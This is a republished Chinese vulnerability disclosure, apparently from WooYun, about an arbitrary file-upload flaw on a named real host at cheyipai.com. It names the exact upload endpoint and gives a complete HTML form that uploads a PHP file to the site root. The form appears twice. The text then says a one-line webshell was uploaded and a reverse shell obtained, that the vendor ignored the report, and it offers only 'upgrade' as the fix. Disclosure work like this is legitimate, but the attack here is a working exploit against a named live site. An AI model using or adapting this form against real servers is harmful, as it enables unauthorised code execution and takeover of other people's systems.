首頁 > web前端 > html教學 > 车易拍某站Getshell_html/css_WEB-ITnose

车易拍某站Getshell_html/css_WEB-ITnose

WBOY
發布: 2016-06-21 08:51:57
原創
1249 人瀏覽過

漏洞标题 车易拍某站Getshell
相关厂商 cheyipai.com
漏洞作者 荒废的腰子
提交时间 2016-03-28 11:03
公开时间 2016-04-02 11:10
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 15
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 getshell, 任意文件上传

漏洞详情

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
登入後複製
登入後複製

上传一句话木马

成功反弹shell

漏洞证明:

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
登入後複製
登入後複製

上传一句话木马

成功反弹shell

修复方案:

升级

版权声明:转载请注明来源 荒废的腰子@ 乌云

【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板